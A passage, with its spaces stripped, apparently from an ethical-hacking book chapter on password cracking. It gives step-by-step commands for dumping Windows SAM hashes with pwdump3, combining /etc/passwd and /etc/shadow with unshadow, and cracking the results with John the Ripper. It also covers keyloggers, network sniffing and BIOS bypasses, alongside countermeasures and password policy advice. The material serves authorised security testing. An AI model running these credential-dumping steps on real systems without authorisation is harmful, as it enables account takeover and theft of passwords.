indowsuserpasswordsusingrainbowtablesfromabootableCD.Rainbowtablesarepre-calculatedpasswordhashesthatcanhelpspeedupthecrackingprocessbycomparingthesehasheswiththehashesobtainedfromthespecificpasswordsbeingtested.ProactivePasswordAuditor(www.elcomsoft.com/ppa.html)runsbrute-force,dictionary,andrainbowcracksagainstextractedLMandNTLMpasswordhashes.ProactiveSystemPasswordRecovery(www.elcomsoft.com/pspr.html)recoverspracticallyanylocallystoredWindowspassword,suchaslogonpasswords,WEP/WPApassphrases,SYSKEYpasswords,andRAS/dialup/VPNpasswords.pwdump3(www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7)extractsWindowspasswordhashesfromtheSAM(Security

http://www.hoobie.net/brutus/


http://www.elcomsoft.com/edpr.html

http://www.elcomsoft.com/esr.html

http://www.openwall.com/john/

http://ophcrack.sourceforge.net

http://www.elcomsoft.com/ppa.html

http://www.elcomsoft.com/pspr.html

http://www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7

AccountsManager)database.RainbowCrack(http://project-rainbowcrack.com)cracksLanManager(LM)andMD5hashesveryquicklybyusingrainbowtables.THC-Hydra(www.thc.org/thc-hydra)crackslogonsforHTTP,FTP,IMAP,SMTP,VNCandmanymore.

Someofthesetoolsrequirephysicalaccesstothesystemsyou’retesting.Youmightbewonderingwhatvaluethataddstopasswordcracking.Ifahackercanobtainphysicalaccesstoyoursystemsandpasswordfiles,youhavemorethanjustbasicinformationsecurityproblemstoworryabout,right?True,butthiskindofaccessisentirelypossible!Whataboutasummerintern,adisgruntledemployee,oranoutsideauditorwithmaliciousintent?Themereriskofanunencryptedlaptopbeinglostorstolenandfallingintothehandsofsomeonewithillintentshouldbereasonenough.

Tounderstandhowtheprecedingpassword-crackingprogramsgenerallywork,youfirstneedtounderstandhowpasswordsareencrypted.Passwordsaretypicallyencryptedwhenthey’restoredonacomputer,usinganencryptionorone-wayhashalgorithm,suchasSHA2orMD5.Hashedpasswordsarethenrepresentedasfixed-lengthencryptedstringsthatalwaysrepresentthesamepasswordswithexactlythesamestrings.Thesehashesareirreversibleforallpracticalpurposes,so,intheory,passwordscanneverbedecrypted.Furthermore,certainpasswords,suchasthoseinLinux,havearandomvaluecalledasaltaddedtothemtocreateadegreeofrandomness.Thispreventsthesamepasswordusedbytwopeoplefromhavingthesamehashvalue.

Password-crackingutilitiestakeasetofknownpasswordsandrunthemthroughapassword-hashingalgorithm.Theresultingencryptedhashesarethencomparedatlightningspeedtothepasswordhashesextractedfromtheoriginalpassworddatabase.Whenamatchisfoundbetweenthenewlygeneratedhashandthehashintheoriginaldatabase,thepasswordhasbeencracked.It’sthatsimple.

Otherpassword-crackingprogramssimplyattempttologonusingapredefinedsetofuserIDsandpasswords.Thisishowmanydictionary-basedcrackingtoolswork,suchasBrutus(www.hoobie.net/brutus)andSQLPing3(www.sqlsecurity.com/downloads).IcovercrackingwebapplicationanddatabasepasswordsinChapters15and16.

Passwordsthataresubjectedtocrackingtoolseventuallylose.Youhaveaccesstothesametoolsasthebadguys.Thesetoolscanbeusedforbothlegitimatesecurityassessmentsandmaliciousattacks.Youwanttofindpasswordweaknessesbeforethebadguysdo,andinthissection,IshowyousomeofmyfavoritemethodsforassessingWindowsandLinux/UNIXpasswords.

http://project-rainbowcrack.com/

http://www.thc.org/thc-hydra/


http://www.sqlsecurity.com/downloads/

Whentryingtocrackpasswords,theassociateduseraccountsmightbelockedout,whichcouldinterruptyourusers.Becarefulifintruderlockoutisenabledinyouroperatingsystems,databases,orapplications.Iflockoutisenabled,youmightlockoutsomeorallcomputer/networkaccounts,resultinginadenialofservicesituationforyourusers.

Passwordstoragelocationsvarybyoperatingsystem:

Windowsusuallystorespasswordsintheselocations:

SecurityAccountsManager(SAM)database(c:\windows\system32\config)ActiveDirectorydatabasefilethat’sstoredlocallyorspreadacrossdomaincontrollers(ntds.dit)

WindowsmayalsostorepasswordsinabackupoftheSAMfileinthec:\winnt\repairorc:\windows\repairdirectory.

SomeWindowsapplicationsstorepasswordsintheRegistryorasplain-textfilesontheharddrive!Asimpleregistryorfile-systemsearchfor“password”mayuncoverjustwhatyou’relookingfor.

LinuxandotherUNIXvariantstypicallystorepasswordsinthesefiles:/etc/passwd(readablebyeveryone)/etc/shadow(accessiblebythesystemandtherootaccountonly)/etc/security/passwd(accessiblebythesystemandtherootaccountonly)/.secure/etc/passwd(accessiblebythesystemandtherootaccountonly)

DictionaryattacksDictionaryattacksquicklycompareasetofknowndictionary-typewords—includingmanycommonpasswords—againstapassworddatabase.Thisdatabaseisatextfilewithhundredsifnotthousandsofdictionarywordstypicallylistedinalphabeticalorder.Forinstance,supposethatyouhaveadictionaryfilethatyoudownloadedfromoneofthesitesinthefollowinglist.TheEnglishdictionaryfileatthePurduesitecontainsonewordperlinestartingwith10th,1st…allthewaytozygote.

Manypassword-crackingutilitiescanuseaseparatedictionarythatyoucreateordownloadfromtheInternet.Herearesomepopularsitesthathousedictionaryfilesandothermiscellaneouswordlists:

ftp://ftp.cerias.purdue.edu/pub/dict


www.outpost9.com/files/WordLists.html

Don’tforgettouseotherlanguagefilesaswell,suchasSpanishandKlingon.

Dictionaryattacksareonlyasgoodasthedictionaryfilesyousupplytoyourpassword-crackingprogram.Youcaneasilyspenddays,evenweeks,tryingtocrackpasswordswithadictionaryattack.Ifyoudon’tsetatimelimitorsimilarexpectationgoingin,you’lllikelyfindthatdictionarycrackingisoftenamereexerciseinfutility.Mostdictionaryattacksaregoodforweak(easily-guessed)passwords.However,somespecialdictionarieshavecommonmisspellingsoralternativespellingsofwords,suchaspa$$w0rd(password)and5ecur1ty(security).Additionally,specialdictionariescancontainnon-Englishwordsandthematicwordsfromreligions,politics,orStarTrek.

Brute-forceattacksBrute-forceattackscancrackpracticallyanypassword,givensufficienttime.Brute-forceattackstryeverycombinationofnumbers,letters,andspecialcharactersuntilthepasswordisdiscovered.Manypassword-crackingutilitiesletyouspecifysuchtestingcriteriaasthecharactersets,passwordlengthtotry,andknowncharacters(fora“mask”attack).SampleProactivePasswordAuditorbrute-forcepassword-crackingoptionsareshowninFigure8-1.

Figure8-1:Brute-forcepassword-crackingoptionsinProactivePasswordAuditor.

Abrute-forcetestcantakequiteawhile,dependingonthenumberofaccounts,

http://www.outpost9.com/files/WordLists.html

theirassociatedpasswordcomplexities,andthespeedofthecomputerthat’srunningthecrackingsoftware.Aspowerfulasbrute-forcetestingcanbe,itliterallycantakeforevertoexhaustallpossiblepasswordcombinations,whichinrealityisnotpracticalineverysituation.

Smarthackersattemptloginsslowlyoratrandomtimessothefailedloginattemptsaren’taspredictableorobviousinthesystemlogfiles.SomemalicioususersmightevencalltheIThelpdesktoattemptaresetoftheaccounttheyjustlockedout.Thissocialengineeringtechniquecouldbeamajorissue,especiallyiftheorganizationhasno(orminimal)mechanismsinplacetoverifythatlocked-outusersarewhotheysaytheyare.

Cananexpiringpassworddeterahacker’sattackandrenderpasswordcrackingsoftwareuseless?Yes.Afterthepasswordischanged,thecrackingmuststartagainifthehackerwantstotestallthepossiblecombinations.Thisisonereasonwhyit’sagoodideatochangepasswordsperiodically.Still,I’mnotabigfanofforcinguserstochangetheirpasswordsoften.Shorteningthechangeintervalcanreducetheriskofpasswordsbeingcrackedbutcanalsobepoliticallyunfavorableinyourbusinessandendupcreatingtheoppositeeffectyou’regoingfor.Youhavetostrikeabalancebetweensecurityandconvenienceandusability.Inmanysituations,Idon’tthinkit’sunreasonabletorequirepasswordchangesevery6to12monthsorafterasuspectedcompromise.

Exhaustivepasswordcrackingattemptsusuallyaren’tnecessary.Mostpasswordsarefairlyweak.Evenminimumpasswordrequirements,suchasapasswordlength,canhelpyouinyourtesting.Youmightbeabletodiscoversecuritypolicyinformationbyusingothertoolsorviayourwebbrowser.(SeePartIVfortoolsandtechniquesfortestingthesecurityofoperatingsystems.SeeChapter15forinformationontestingwebsites/applications.)Ifyoufindthispasswordpolicyinformation,youcanconfigureyourcrackingprogramswithmorewell-definedcrackingparameters,whichoftengeneratefasterresults.

RainbowattacksArainbowpasswordattackusesrainbowcrackingtocrackvariouspasswordhashesforLM,NTLM,CiscoPIX,andMD5muchmorequicklyandwithextremelyhighsuccessrates(near100percent).Passwordcrackingspeedisincreasedinarainbowattackbecausethehashesareprecalculatedandthusdon’thavetobegeneratedindividuallyontheflyastheyarewithdictionaryandbrute-forcecrackingmethods.

Unlikedictionaryandbrute-forceattacks,rainbowattackscannotbeusedtocrackpasswordhashesofunlimitedlength.Thecurrentmaximumlengthfor

MicrosoftLMhashesis14characters,andthemaximumisupto16characters(dictionary-based)forWindowsVistaand7hashes(alsoknownasNThashes).Therainbowtablesareavailableforpurchaseanddownloadviatheophcracksiteathttp://ophcrack.sourceforge.net.There’salengthlimitationbecauseittakessignificanttimetogeneratetheserainbowtables.Givenenoughtime,asufficientnumberoftableswillbecreated.Ofcourse,bythen,computersandapplicationslikelyhavedifferentauthenticationmechanismsandhashingstandards—includinganewsetofvulnerabilities—tocontendwith.JobsecurityforITprofessionalsworkinginthisareaneverceasestogrow.

Ifyouhaveagoodsetofrainbowtables,suchasthoseofferedviatheophcracksiteandProjectRainbowCrack(http://project-rainbowcrack.com),youcancrackpasswordsinseconds,minutes,orhoursversusthedays,weeks,orevenyearsrequiredbydictionaryandbrute-forcemethods.

CrackingWindowspasswordswithpwdump3andJohntheRipperThefollowingstepsusetwoofmyfavoriteutilitiestotestthesecurityofcurrentpasswordsonWindowssystems:

pwdump3(toextractpasswordhashesfromtheWindowsSAMdatabase)JohntheRipper(tocrackthehashesofWindowsandLinux/UNIXpasswords)

ThefollowingtestrequiresadministrativeaccesstoeitheryourWindowsstandaloneworkstationortheserver:

1. CreateanewdirectorycalledpasswordsfromtherootofyourWindowsC:drive.

2. Downloadandinstalladecompressiontoolifyoudon’talreadyhaveone.

WinZip(www.winzip.com)isagoodcommercialtoolIuseand7-Zip(www.7-zip.org)isafreedecompressiontool.Windowsalsoincludesbuilt-inZipfilehandling,albeitabitkludgy.

3. Download,extract,andinstallthefollowingsoftwareintothepasswordsdirectoryyoucreated,ifyoudon’talreadyhaveitonyoursystem:

pwdump3:Downloadthefilefromwww.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-

vista-7.JohntheRipper:Downloadthefilefromwww.openwall.com/john.

4. Enterthefollowingcommandtorunpwdump3andredirectitsoutputtoafilecalledcracked.txt:

c:\passwords\pwdump3>cracked.txt

http://ophcrack.sourceforge.net


http://www.winzip.com/

http://www.7-zip.org/



ThisfilecapturestheWindowsSAMpasswordhashesthatarecrackedwithJohntheRipper.Figure8-2showsthecontentsofthecracked.txtfilethatcontainsthelocalWindowsSAMdatabasepasswordhashes.

5. EnterthefollowingcommandtorunJohntheRipperagainsttheWindowsSAMpasswordhashestodisplaythecrackedpasswords:

c:\passwords\johncracked.txt

Thisprocess—showninFigure8-3—cantakesecondsordays,dependingonthenumberofusersandthecomplexityoftheirassociatedpasswords.MyWindowsexampletookonlyfivesecondstocrackfiveweakpasswords.

Figure8-2:Outputfrompwdump3.

Figure8-3:CrackedpasswordfilehashesusingJohntheRipper.

CrackingUNIX/LinuxpasswordswithJohntheRipperJohntheRippercanalsocrackUNIX/Linuxpasswords.Youneedrootaccesstoyoursystemandtothepassword(/etc/passwd)andshadowpassword(/etc/shadow)files.PerformthefollowingstepsforcrackingUNIX/Linuxpasswords:

1. DownloadtheUNIXsourcefilesfromwww.openwall.com/john.2. Extracttheprogrambyenteringthefollowingcommand:

[root@localhostkbeaver]#tar-zxfjohn-1.8.0.tar.xz

orwhateverthecurrentfilenameis.

YoucanalsocrackUNIXorLinuxpasswordsonaWindowssystembyusingtheWindows/DOSversionofJohntheRipper.

3. Changetothe/srcdirectorythatwascreatedwhenyouextractedtheprogram


andenterthefollowingcommand:makegeneric

4. Changetothe/rundirectoryandenterthefollowingcommandtousetheunshadowprogramtocombinethepasswdandshadowfilesandcopythemtothefilecracked.txt:

./unshadow/etc/passwd/etc/shadow>cracked.txt

Theunshadowprocesswon’tworkwithallUNIXvariants.

5. Enterthefollowingcommandtostartthecrackingprocess:./johncracked.txt

WhenJohntheRipperiscomplete(andthiscouldtakesometime),theoutputissimilartotheresultsoftheprecedingWindowsprocess.(RefertoFigure8-3.)

AftercompletingtheprecedingWindowsorUNIXsteps,youcaneitherforceuserstochangepasswordsthatdon’tmeetspecificpasswordpolicyrequirements,youcancreateanewpasswordpolicy,oryoucanusetheinformationtoupdateyoursecurityawarenessprogram.Justdosomething.

Becarefulhandlingtheresultsofyourpasswordcrackingefforts.Youcreateanaccountabilityissuebecausemorethanonepersonnowknowsthepasswords.Alwaystreatthepasswordinformationofothersasstrictlyconfidential.Ifyouendupstoringthemonyourtestsystem,makesureit’sextrasecure.Ifit’salaptop,encryptingtheharddriveisthebestdefense.

PasswordsbythenumbersOnehundredtwenty-eightdifferentASCIIcharactersareusedintypicalcomputerpasswords.(Technically,only126charactersareusedbecauseyoucan’tusetheNULLandthecarriagereturncharacters.)Atrulyrandomeight-characterpasswordthatuses126differentcharacterscanhave63,527,879,748,485,376differentcombinations.Takingthatastepfurther,ifitwerepossible(anditisinLinuxandUNIX)touseall256ASCIIcharacters(254,withoutNULLandcarriagereturncharacters)inapassword,17,324,859,965,700,833,536differentcombinationswouldbeavailable.Thisisapproximately2.7billiontimesmorecombinationsthantherearepeopleonearth!

Atextfilecontainingallthepossiblepasswordswouldrequiremillionsofterabytesofstoragespace.Evenifyouincludeonlythemorerealisticcombinationof95orsoASCIIletters,numbers,andstandardpunctuationcharacters,suchafilewouldstillfillthousandsofterabytesofstoragespace.Thesestoragerequirementsforcedictionaryandbrute-forcepassword-crackingprogramstoformthepasswordcombinationsonthefly,insteadofreadingallpossiblecombinationsfromatextfile.That’swhyrainbowattacksaremoreeffectiveatcrackingpasswordsthandictionaryandbrute-forceattacks.

Giventheeffectivenessofrainbowpasswordattacks,it’srealistictothinkthateventually,anyonewillbeabletocrackallpossiblepasswordcombinations,giventhecurrenttechnologyandaveragelifespan.Itprobablywon’thappen;however,manythoughtinthe1980sthat640KofRAManda10MBharddriveinaPCwereallthatwouldeverbeneeded!

Crackingpassword-protectedfilesDoyouwonderhowvulnerablepassword-protectedword-processing,spreadsheet,andZipfilesarewhenuserssendthemintothewildblueyonder?Wondernomore.Somegreatutilitiescanshowhoweasilypasswordsarecracked.

CrackingfilesMostpassword-protectedfilescanbecrackedinsecondsorminutes.Youcandemonstratethis“wowfactor”securityvulnerabilitytousersandmanagement.Here’sahypotheticalscenariothatcouldoccurintherealworld:

1. YourCFOwantstosendsomeconfidentialfinancialinformationinanExcelspreadsheettoacompanyboardmember.

2. Sheprotectsthespreadsheetbyassigningitapasswordduringthefile-saveprocessinExcel.

3. Forgoodmeasure,sheusesWinZiptocompressthefileandaddsanotherpasswordtomakeitreallysecure.

4. TheCFOsendsthespreadsheetasane-mailattachment,assumingthatthee-mailwillreachitsdestination.

Thefinancialadvisor’snetworkhascontentfiltering,whichmonitorsincominge-mailsforkeywordsandfileattachments.Unfortunately,thefinancialadvisoryfirm’snetworkadministratorislookinginthecontent-filteringsystemtoseewhat’scomingin.

5. Thisroguenetworkadministratorfindsthee-mailwiththeconfidentialattachment,savestheattachment,andrealizesthatit’spasswordprotected.

6. Thenetworkadministratorremembersagreatpassword-crackingtoolavailablefromElcomSoftcalledAdvancedArchivePasswordRecovery

(www.elcomsoft.com/archpr.html)thatcanhelphimoutsoheproceedstouseittocrackthepassword.

Crackingpassword-protectedfilesisassimpleasthat!Nowallthattheroguenetworkadministratormustdoisforwardtheconfidentialspreadsheettohisbuddiesortothecompany’scompetitors.

IfyoucarefullyselecttherightoptionsinAdvancedArchivePasswordRecovery,youcandrasticallyshortenyourtestingtime.Forexample,ifyouknowthatapasswordisnotoverfivecharacterslongorislowercaselettersonly,youcancutthecrackingtimeinhalf.

Irecommendperformingthesefile-password-crackingtestsonfilesthatyoucapturewithacontentfilteringornetworkanalysistool.Thisisagoodwaytodeterminewhetheryourusersareadheringtopolicyandusingadequatepasswordstoprotectsensitiveinformationthey’resending.

CountermeasuresThebestdefenseagainstweakfilepasswordprotectionistorequireyouruserstouseastrongerformoffileprotection,suchasPGP,ortheAESencryptionthat’sbuiltintoWinZip,whennecessary.Ideally,youdon’twanttorelyonuserstomakedecisionsaboutwhattheyshouldusetosecuresensitiveinformation,butit’sbetterthannothing.Stressthatafileencryptionmechanism,suchasapassword-protectedZipfile,issecureonlyifuserskeeptheirpasswordsconfidentialandnevertransmitorstoretheminunsecurecleartext(suchasinaseparatee-mail).

Ifyou’reconcernedaboutunsecuretransmissionsthroughe-mail,considerusingacontent-filteringsystemoradataloss–preventionsystemtoblockalloutbounde-mailattachmentsthataren’tprotectedonyoure-mailserver.

UnderstandingotherwaystocrackpasswordsOvertheyears,I’vefoundotherwaystocrack(orcapture)passwordstechnicallyandthroughsocialengineering.

KeystrokeloggingOneofthebesttechniquesforcapturingpasswordsisremotekeystrokelogging—theuseofsoftwareorhardwaretorecordkeystrokesasthey’retypedintothecomputer.

Becarefulwithkeystrokelogging.Evenwithgoodintentions,monitoringemployeesraisesvariouslegalissuesifit’snotdonecorrectly.Discusswithyourlegalcounselwhatyou’llbedoing,askfortheirguidance,andgetapprovalfromuppermanagement.

http://www.elcomsoft.com/archpr.html

Loggingtools

Withkeystroke-loggingtools,youcanassessthelogfilesofyourapplicationtoseewhatpasswordspeopleareusing:

Keystroke-loggingapplicationscanbeinstalledonthemonitoredcomputer.IrecommendthatyoucheckoutSpector360bySpectorSoft(www.spector360.com).DozensofothersuchtoolsareavailableontheInternet.Hardware-basedtools,suchasKeyGhost(www.keyghost.com),fitbetweenthekeyboardandthecomputerorreplacethekeyboardaltogether.

Akeystroke-loggingtoolinstalledonasharedcomputercancapturethepasswordsofeveryuserwhologsin.

Countermeasures

Thebestdefenseagainsttheinstallationofkeystroke-loggingsoftwareonyoursystemsistouseananti-malwareprogramorsimilarendpointprotectionsoftwarethatmonitorsthelocalhost.It’snotfoolproofbutcanhelp.Asforphysicalkeyloggers,you’llneedtovisuallyinspecteachsystem.

Thepotentialforhackerstoinstallkeystroke-loggingsoftwareisanotherreasontoensurethatyourusersaren’tdownloadingandinstallingrandomsharewareoropeningattachmentsinunsolicitede-mails.ConsiderlockingdownyourdesktopsbysettingtheappropriateuserrightsthroughlocalorgroupsecuritypolicyinWindows.Alternatively,youcoulduseacommerciallockdownprogram,suchasFortres101(www.fortresgrand.com)forWindowsorDeepFreezeEnterprise(www.faronics.com/products/deep-freeze/enterprise)forWindows,Linux,andMacOSX.AdifferenttechnologythatstillfallsintothiscategoryisBit9’s“positivesecurity”whitelistingapplication(www.bit9.com)thatallowsyoutoconfigurewhichexecutablescanberunonanygivensystem.It’sintendedtofightoffadvancedmalwarebutcouldcertainlybeusedinthissituation.

WeakpasswordstorageManylegacyandstandaloneapplications,suchase-mail,dial-upnetworkconnections,andaccountingsoftware,storepasswordslocally,makingthemvulnerabletopasswordhacking.Byperformingabasictextsearch,I’vefoundpasswordsstoredincleartextonthelocalharddrivesofmachines.YoucanautomatetheprocessevenfurtherbyusingaprogramcalledFileLocatorPro(www.mythicsoft.com).IcoverthesefileandrelatedstoragevulnerabilitiesinChapter16.

Searching

http://www.spector360.com

http://www.keyghost.com/

http://www.fortresgrand.com/

http://www.faronics.com/products/deep-freeze/enterprise/

http://www.bit9.com

http://www.mythicsoft.com

Youcantryusingyourfavoritetext-searchingutility—suchastheWindowssearchfunction,findstr,orgrep—tosearchforpasswordorpasswdonyourcomputer’sdrives.Youmightbeshockedtofindwhat’sonyoursystems.Someprogramsevenwritepasswordstodiskorleavethemstoredinmemory.

Weakpasswordstorageisacriminalhacker’sdream.Headitoffifyoucan.Thisdoesn’tmeantoimmediatelyrunoffandstartusingacloud-basedpasswordmanager.Aswe’veseenovertheyears,thosesystemsgethackedaswell!

Countermeasures

Theonlyreliablewaytoeliminateweakpasswordstorageistouseonlyapplicationsthatstorepasswordssecurely.Thismightnotbepractical,butit’syouronlyguaranteethatyourpasswordsaresecure.Anotheroptionistoinstructusersnottostoretheirpasswordswhenprompted.

Beforeupgradingapplications,contactyoursoftwarevendortoseehowtheymanagepasswords,orsearchforathird-partysolution.

NetworkanalyzerAnetworkanalyzersniffsthepacketstraversingthenetwork.Thisiswhatthebadguysdoiftheycangaincontrolofacomputer,tapintoyourwirelessnetwork,orgainphysicalnetworkaccesstosetuptheirnetworkanalyzer.Iftheygainphysicalaccess,theycanlookforanetworkjackonthewallandplugrightin!

Testing

Figure8-4showshowcrystal-clearpasswordscanbethroughtheeyesofanetworkanalyzer.ThisfigureshowshowCain&Abel(www.oxid.it/cain.html)cangleanthousandsofpasswordsgoingacrossthenetworkinamatterofacoupleofhours.Asyoucanseeintheleftpane,thesecleartextpasswordvulnerabilitiescanapplytoFTP,web,telnet,andmore.(Theactualusernamesandpasswordsareblurredouttoprotectthem.)


Figure8-4:UsingCain&Abeltocapturepasswordsgoingacrossthenetwork.

IftrafficisnottunneledthroughaVPN,SSH,SSL,orsomeotherformofencryptedlink,it’svulnerabletoattack.

Cain&Abelisapassword-crackingtoolthatalsohasnetworkanalysiscapabilities.Youcanalsousearegularnetworkanalyzer,suchasthecommercialproductsOmniPeek(www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysisandCommView(www.tamos.com/products/commview)aswellasthefreeopensourceprogram,Wireshark(www.wireshark.org).Withanetworkanalyzer,youcansearchforpasswordtrafficinvariousways.Forexample,tocapturePOP3passwordtraffic,youcansetupafilterandatriggertosearchforthePASScommand.WhenthenetworkanalyzerseesthePASScommandinthepacket,itcapturesthatspecificdata.

Networkanalyzersrequireyoutocapturedataonahubsegmentofyournetworkorviaamonitor/mirror/spanportonaswitch.Otherwise,youcan’tseeanyoneelse’sdatatraversingthenetwork—justyours.Checkyourswitch’suserguideforwhetherithasamonitorormirrorportandinstructionsonhowtoconfigureit.Youcanconnectyournetworkanalyzertoahubonthepublicsideofyourfirewall.You’llcaptureonlythosepacketsthatareenteringorleavingyournetwork—notinternaltraffic.IcoverthistypeofnetworkinfrastructurehackingindetailinChapter9.

Countermeasures

Herearesomegooddefensesagainstnetworkanalyzerattacks:

Useswitchesonyournetwork,nothubs.Ethernethubsareathingofthepast,however,Istillseetheminuseoccasionally.Ifyoumustusehubsonnetworksegments,aprogramlikesniffdet(http://sniffdet.sourceforge.net)forUNIX-basedsystemsandPromiscDetect

https://www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis

http://www.tamos.com/products/commview/

http://www.wireshark.org/

http://sniffdet.sourceforge.net/

(http://ntsecurity.nu/toolbox/promiscdetect)forWindowscandetectnetworkcardsinpromiscuousmode(acceptingallpackets,whetherdestinedforthelocalmachineornot).Anetworkcardinpromiscuousmodesignifiesthatanetworkanalyzermayberunningonthenetwork.Makesurethatunsupervisedareas,suchasanunoccupiedlobbyortrainingroom,don’thavelivenetworkconnections.Don’tletanyonewithoutabusinessneedgainphysicalaccesstoyourswitchesortothenetworkconnectiononthepublicsideofyourfirewall.Withphysicalaccess,ahackercanconnecttoaswitchmonitorportortapintotheunswitchednetworksegmentoutsidethefirewallandcapturepackets.

Switchesdon’tprovidecompletesecuritybecausethey’revulnerabletoARPpoisoningattacks,whichIcoverinChapter9.

WeakBIOSpasswordsMostcomputerBIOS(basicinput/outputsystem)settingsallowpower-onpasswordsand/orsetuppasswordstoprotectthecomputer’shardwaresettingsthatarestoredintheCMOSchip.Herearesomewaysaroundthesepasswords:

YoucanusuallyresetthesepasswordseitherbyunpluggingtheCMOSbatteryorbychangingajumperonthemotherboard.Password-crackingutilitiesforBIOSpasswordsareavailableontheInternetandfromcomputermanufacturers.Ifgainingaccesstotheharddriveisyourultimategoal,youcansimplyremovetheharddrivefromthecomputerandinstallitinanotheroneandyou’regoodtogo.ThisisagreatwaytoprovethatBIOS/power-onpasswordsarenotaneffectivecountermeasureforlostorstolenlaptops.

Foragoodlistofdefaultsystempasswordsforvariousvendorequipment,checkwww.cirt.net/passwords.

Therearetonsofvariablesforhackingandhackingcountermeasuresdependingonyourhardwaresetup.IfyouplantohackyourownBIOSpasswords,checkforinformationinyourusermanualorrefertotheBIOSpassword-hackingguideIwroteathttp://searchenterprisedesktop.techtarget.com/tutorial/BIOS-password-hacking.Ifprotectingtheinformationonyourharddrivesisyourultimategoal,thenfull(sometimesreferredtoaswhole)diskisthebestwaytogo.Icovermobile-relatedpasswordcrackingin-depthinChapter11.Thegoodnewsisthatnewercomputers(withinthepastfiveyearsorso)areusinganewtypeofBIOScalledunifiedextensiblefirmwareinterface(UEFI),whichismuchmoreresilienttoboot-levelsystemcracking

http://ntsecurity.nu/toolbox/promiscdetect/

http://www.cirt.net/passwords/

http://searchenterprisedesktop.techtarget.com/tutorial/BIOS-password-hacking

attempts.Still,aweakpasswordmaybeallittakesforthesystemtobeexploited.

WeakpasswordsinlimboBadguysoftenexploituseraccountsthathavejustbeencreatedorresetbyanetworkadministratororhelpdesk.Newaccountsmightneedtobecreatedfornewemployeesorevenforyourownsecuritytestingpurposes.Accountsmightneedtoberesetifusersforgettheirpasswordsoriftheaccountshavebeenlockedoutbecauseoffailedattempts.

Weaknesses

Herearesomereasonswhyuseraccountscanbevulnerable:

Whenuseraccountsarereset,theyoftenareassignedaneasily-crackedpassword(suchastheuser’snameorthewordpassword).Thetimebetweenresettingtheuseraccountandchangingthepasswordisaprimeopportunityforabreak-in.Manysystemshaveeitherdefaultaccountsorunusedaccountswithweakpasswordsornopasswordsatall.Theseareprimetargets.

Countermeasures

Thebestdefensesagainstattacksonpasswordsinlimboaresolidhelpdeskpoliciesandproceduresthatpreventweakpasswordsfrombeingavailableatanygiventimeduringthenewaccountgenerationandpasswordresetprocesses.Perhapsthebestwaystoovercomethisvulnerabilityareasfollows:

Requireuserstobeonthephonewiththehelpdesk,orhaveahelpdeskmemberperformtheresetattheuser’sdesk.Requirethattheuserimmediatelyloginandchangethepassword.Ifyouneedtheultimateinsecurity,implementstrongerauthenticationmethods,suchaschallenge/responsequestions,smartcards,ordigitalcertificates.Automatepasswordresetfunctionalityviaself-servicetoolsonyournetworksouserscanmanagemostoftheirpasswordproblemswithouthelpfromothers.

Icovermobile-relatedpasswordcrackinginChapter11andwebsite/applicationpasswordcrackinginChapter15.

GeneralPasswordCrackingCountermeasures

Apasswordforonesystemusuallyequalspasswordsformanyothersystemsbecausemanypeopleusethesame(oratleastsimilar)passwordsoneverysystemtheyuse.Forthisreason,youmightwanttoconsiderinstructinguserstocreatedifferentpasswordsfordifferentsystems,especiallyonthesystemsthatprotectinformationthat’smoresensitive.Theonlydownsidetothisisthatusershavetokeepmultiplepasswordsand,therefore,mightbetemptedtowritethemdown,whichcannegateanybenefits.

Strongpasswordsareimportant,butyouneedtobalancesecurityandconvenience:

Youcan’texpectuserstomemorizepasswordsthatareinsanelycomplexandmustbechangedeveryfewweeks.Youcan’taffordweakpasswordsornopasswordsatall,socomeupwithastrongpasswordpolicyandaccompanyingstandard—preferablyonethatrequireslongandstrongpassphrases(combinationsofwordsthatareeasilyrememberedyetnexttoimpossibletocrack)thathavetobechangedonlyonceortwiceayear.

StoringpasswordsIfyouhavetochoosebetweenweakpasswordsthatyouruserscanmemorizeandstrongpasswordsthatyourusersmustwritedown,Irecommendhavingreaderswritedownpasswordsandstoretheinformationsecurely.Trainuserstostoretheirwrittenpasswordsinasecureplace—notonkeyboardsorineasilycrackedpassword-protectedcomputerfiles(suchasspreadsheets).Usersshouldstoreawrittenpasswordinanyoftheselocations:

AlockedfilecabinetorofficesafeFull(whole)diskencryptionwhichcanpreventanintruderfromeveraccessingtheOSandpasswordsstoredonthesystem.Justknowit’snotfoolproof,asIoutlineinChapter11.Asecurepasswordmanagementtoolsuchas:

LastPass(http://lastpass.com)PasswordSafe,anopensourcesoftwareoriginallydevelopedbyCounterpane(http://passwordsafe.sourceforge.net)

Again,asImentionedearlier,applicationssuchasthesearenotimpervioustoattacksobecareful.

http://lastpass.com/

http://passwordsafe.sourceforge.net/

Nopasswordsonstickynotes!Peoplejokeaboutit,butitstillhappensalot,andit’snotgoodforbusiness!

CreatingpasswordpoliciesAsanethicalhacker,youshouldshowuserstheimportanceofsecuringtheirpasswords.Herearesometipsonhowtodothat:

Demonstratehowtocreatesecurepasswords.Refertothemaspassphrasesbecausepeopletendtotakepasswordsliterallyanduseonlywords,whichcanbelesssecure.Showwhatcanhappenwhenweakpasswordsareusedorpasswordsareshared.Diligentlybuilduserawarenessofsocialengineeringattacks.

Enforce(oratleastencouragetheuseof)astrongpassword-creationpolicythatincludesthefollowingcriteria:

Useupper-andlowercaseletters,specialcharacters,andnumbers.Neveruseonlynumbers.Suchpasswordscanbecrackedquickly.Misspellwordsorcreateacronymsfromaquoteorasentence.Forexample,ASCIIisanacronymforAmericanStandardCodeforInformationInterchangethatcanalsobeusedaspartofapassword.Usepunctuationcharacterstoseparatewordsoracronyms.Changepasswordsevery6to12monthsorimmediatelyifthey’resuspectedofbeingcompromised.Anythingmorefrequentintroducesaninconveniencethatservesonlytocreatemorevulnerabilities.Usedifferentpasswordsforeachsystem.Thisisespeciallyimportantfornetworkinfrastructurehosts,suchasservers,firewalls,androuters.It’sokaytousesimilarpasswords—justmakethemslightlydifferentforeachtypeofsystem,suchasSummerInTheSouth-Win10forWindowssystemsandLinux+SummerInTheSouthforLinuxsystems.Usevariable-lengthpasswords.Thistrickcanthrowoffattackersbecausetheywon’tknowtherequiredminimumormaximumlengthofpasswordsandmusttryallpasswordlengthcombinations.Don’tusecommonslangwordsorwordsthatareinadictionary.Don’trelycompletelyonsimilar-lookingcharacters,suchas3insteadofE,5insteadofS,or!insteadof1.Password-crackingprogramsanddictionariesareavailabletohelpcheckforthis.Do